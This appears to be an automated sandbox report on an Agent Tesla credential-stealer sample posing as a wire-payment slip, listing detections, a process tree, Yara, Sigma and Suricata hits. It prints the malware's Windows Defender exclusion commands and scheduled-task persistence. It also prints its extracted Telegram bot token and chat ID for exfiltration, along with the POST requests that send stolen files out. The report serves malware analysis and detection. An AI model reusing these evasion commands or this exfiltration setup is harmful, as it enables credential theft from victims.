Edit tour

Windows Analysis Report
Wire slip account payable.pif.exe

Overview

General Information

Sample name:	Wire slip account payable.pif.exe
Analysis ID:	1560051
MD5:	f3c67cd1bbb9c8a8bcb56ee97c5a7b27
SHA1:	ad3397267ada55bca8d547dbb93bc79f40d138cf
SHA256:	a36c66fb7fdfb2639cc0ccdeaeef4e6c1a1cd103ba76309ed32777b3f2ab069d
Tags:	AgentTeslaexePaymentpifuser-cocaman
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AgentTesla

Yara detected AntiVM3

Yara detected Telegram RAT

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Check if machine is in data center or colocation facility

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to log keystrokes (.Net Source)

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE / OLE file has an invalid certificate

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Wire slip account payable.pif.exe (PID: 1596 cmdline: "C:\Users\user\Desktop\Wire slip account payable.pif.exe" MD5: F3C67CD1BBB9C8A8BCB56EE97C5A7B27)

powershell.exe (PID: 7172 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Wire slip account payable.pif.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7212 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EQVRGq.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7660 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 7244 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EQVRGq" /XML "C:\Users\user\AppData\Local\Temp\tmp14C9.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Wire slip account payable.pif.exe (PID: 7432 cmdline: "C:\Users\user\Desktop\Wire slip account payable.pif.exe" MD5: F3C67CD1BBB9C8A8BCB56EE97C5A7B27)

EQVRGq.exe (PID: 7560 cmdline: C:\Users\user\AppData\Roaming\EQVRGq.exe MD5: F3C67CD1BBB9C8A8BCB56EE97C5A7B27)

schtasks.exe (PID: 7788 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EQVRGq" /XML "C:\Users\user\AppData\Local\Temp\tmp25B1.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

EQVRGq.exe (PID: 7848 cmdline: "C:\Users\user\AppData\Roaming\EQVRGq.exe" MD5: F3C67CD1BBB9C8A8BCB56EE97C5A7B27)

EQVRGq.exe (PID: 7856 cmdline: "C:\Users\user\AppData\Roaming\EQVRGq.exe" MD5: F3C67CD1BBB9C8A8BCB56EE97C5A7B27)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7180778750:AAGcpZL53RI1C6DEr2Yp4lM3UKxKArXTZ4I/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot7180778750:AAGcpZL53RI1C6DEr2Yp4lM3UKxKArXTZ4I/sendMessage?chat_id=5968311109"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Memory Dumps

Source	Rule	Description	Author
0000000E.00000002.4160006353.00000000030E7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000008.00000002.4160419994.0000000002C67000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000E.00000002.4160006353.00000000030BD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000E.00000002.4160006353.00000000030C5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000E.00000002.4156921024.0000000000433000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000002.4156921024.0000000000433000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000E.00000002.4156921024.0000000000433000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1740228748.0000000003D39000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1740228748.0000000003D39000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.1740228748.0000000003D39000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000E.00000002.4160006353.0000000003061000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000002.4160006353.0000000003061000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000E.00000002.4160006353.0000000003061000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000008.00000002.4160419994.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.4160419994.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000008.00000002.4160419994.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: Wire slip account payable.pif.exe PID: 1596	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Wire slip account payable.pif.exe PID: 1596	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Wire slip account payable.pif.exe PID: 1596	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: Wire slip account payable.pif.exe PID: 1596	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: Wire slip account payable.pif.exe PID: 7432	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Wire slip account payable.pif.exe PID: 7432	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: Wire slip account payable.pif.exe PID: 7432	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: EQVRGq.exe PID: 7560	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: EQVRGq.exe PID: 7856	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: EQVRGq.exe PID: 7856	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: EQVRGq.exe PID: 7856	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 22 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.Wire slip account payable.pif.exe.3e03808.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Wire slip account payable.pif.exe.3e03808.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Wire slip account payable.pif.exe.3e03808.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Wire slip account payable.pif.exe.3e03808.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x34538:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x345aa:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x34634:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x346c6:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x34730:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x347a2:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x34838:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x348c8:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.Wire slip account payable.pif.exe.3dc59e8.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Wire slip account payable.pif.exe.3dc59e8.2.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Wire slip account payable.pif.exe.3dc59e8.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Wire slip account payable.pif.exe.3dc59e8.2.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x34538:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x345aa:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x34634:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x346c6:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x34730:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x347a2:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x34838:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x348c8:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.Wire slip account payable.pif.exe.3e03808.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Wire slip account payable.pif.exe.3e03808.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.Wire slip account payable.pif.exe.3e03808.0.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Wire slip account payable.pif.exe.3e03808.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Wire slip account payable.pif.exe.3e03808.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x36338:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x73f58:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x363aa:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x73fca:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x36434:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x74054:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x364c6:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x740e6:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x36530:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x74150:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x365a2:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x741c2:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x36638:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x74258:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x366c8:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x742e8:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.Wire slip account payable.pif.exe.3dc59e8.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Wire slip account payable.pif.exe.3dc59e8.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.Wire slip account payable.pif.exe.3dc59e8.2.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Wire slip account payable.pif.exe.3dc59e8.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Wire slip account payable.pif.exe.3dc59e8.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x36338:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x74158:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0xb1d78:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x363aa:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x741ca:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0xb1dea:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x36434:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x74254:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0xb1e74:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x364c6:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x742e6:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0xb1f06:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x36530:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x74350:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0xb1f70:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x365a2:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x743c2:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0xb1fe2:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x36638:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x74458:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0xb2078:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
Click to see the 13 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Wire slip account payable.pif.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Wire slip account payable.pif.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Wire slip account payable.pif.exe", ParentImage: C:\Users\user\Desktop\Wire slip account payable.pif.exe, ParentProcessId: 1596, ParentProcessName: Wire slip account payable.pif.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Wire slip account payable.pif.exe", ProcessId: 7172, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EQVRGq" /XML "C:\Users\user\AppData\Local\Temp\tmp25B1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EQVRGq" /XML "C:\Users\user\AppData\Local\Temp\tmp25B1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\EQVRGq.exe, ParentImage: C:\Users\user\AppData\Roaming\EQVRGq.exe, ParentProcessId: 7560, ParentProcessName: EQVRGq.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EQVRGq" /XML "C:\Users\user\AppData\Local\Temp\tmp25B1.tmp", ProcessId: 7788, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EQVRGq" /XML "C:\Users\user\AppData\Local\Temp\tmp14C9.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EQVRGq" /XML "C:\Users\user\AppData\Local\Temp\tmp14C9.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Wire slip account payable.pif.exe", ParentImage: C:\Users\user\Desktop\Wire slip account payable.pif.exe, ParentProcessId: 1596, ParentProcessName: Wire slip account payable.pif.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EQVRGq" /XML "C:\Users\user\AppData\Local\Temp\tmp14C9.tmp", ProcessId: 7244, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Wire slip account payable.pif.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Wire slip account payable.pif.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Wire slip account payable.pif.exe", ParentImage: C:\Users\user\Desktop\Wire slip account payable.pif.exe, ParentProcessId: 1596, ParentProcessName: Wire slip account payable.pif.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Wire slip account payable.pif.exe", ProcessId: 7172, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EQVRGq" /XML "C:\Users\user\AppData\Local\Temp\tmp14C9.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EQVRGq" /XML "C:\Users\user\AppData\Local\Temp\tmp14C9.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Wire slip account payable.pif.exe", ParentImage: C:\Users\user\Desktop\Wire slip account payable.pif.exe, ParentProcessId: 1596, ParentProcessName: Wire slip account payable.pif.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EQVRGq" /XML "C:\Users\user\AppData\Local\Temp\tmp14C9.tmp", ProcessId: 7244, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Agent Tesla Telegram Exfil

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-21T11:02:11.422015+0100	2851779	1	Malware Command and Control Activity Detected	192.168.2.4	49737	149.154.167.220	443	TCP
2024-11-21T11:02:14.684700+0100	2851779	1	Malware Command and Control Activity Detected	192.168.2.4	49741	149.154.167.220	443	TCP

ETPRO MALWARE Agent Tesla Telegram Exfil M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-21T11:02:11.422015+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.4	49737	149.154.167.220	443	TCP
2024-11-21T11:02:13.971032+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.4	49740	149.154.167.220	443	TCP
2024-11-21T11:02:14.684700+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.4	49741	149.154.167.220	443	TCP
2024-11-21T11:02:17.101071+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.4	49742	149.154.167.220	443	TCP

ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-21T11:02:11.743222+0100	2854281	1	A Network Trojan was detected	149.154.167.220	443	192.168.2.4	49737	TCP
2024-11-21T11:02:14.259420+0100	2854281	1	A Network Trojan was detected	149.154.167.220	443	192.168.2.4	49740	TCP
2024-11-21T11:02:14.976060+0100	2854281	1	A Network Trojan was detected	149.154.167.220	443	192.168.2.4	49741	TCP
2024-11-21T11:02:17.435516+0100	2854281	1	A Network Trojan was detected	149.154.167.220	443	192.168.2.4	49742	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.raw.unpack	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot7180778750:AAGcpZL53RI1C6DEr2Yp4lM3UKxKArXTZ4I/sendMessage?chat_id=5968311109"}
Source: EQVRGq.exe.7856.14.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7180778750:AAGcpZL53RI1C6DEr2Yp4lM3UKxKArXTZ4I/sendMessage"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\EQVRGq.exe

ReversingLabs: Detection: 63%

Multi AV Scanner detection for submitted file

Source: Wire slip account payable.pif.exe

ReversingLabs: Detection: 63%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\EQVRGq.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Wire slip account payable.pif.exe

Joe Sandbox ML: detected

Source: Wire slip account payable.pif.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49741 version: TLS 1.2

Source: Wire slip account payable.pif.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Code function: 4x nop then jmp 0749B331h		0_2_0749B479
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Code function: 4x nop then jmp 06C1A5C9h		9_2_06C1A711

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.4:49741 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49741 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.4:49737 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49737 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.4:49741
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49740 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.4:49740
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49742 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.4:49737
Source: Network traffic	Suricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.4:49742

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 0.2.Wire slip account payable.pif.exe.3e03808.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: POST /bot7180778750:AAGcpZL53RI1C6DEr2Yp4lM3UKxKArXTZ4I/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd09e9a634aff9Host: api.telegram.orgContent-Length: 915Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7180778750:AAGcpZL53RI1C6DEr2Yp4lM3UKxKArXTZ4I/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd0a0b1ada11a6Host: api.telegram.orgContent-Length: 3951Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7180778750:AAGcpZL53RI1C6DEr2Yp4lM3UKxKArXTZ4I/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd09e9a859de79Host: api.telegram.orgContent-Length: 915Expect: 100-continueConnection: Keep-Alive
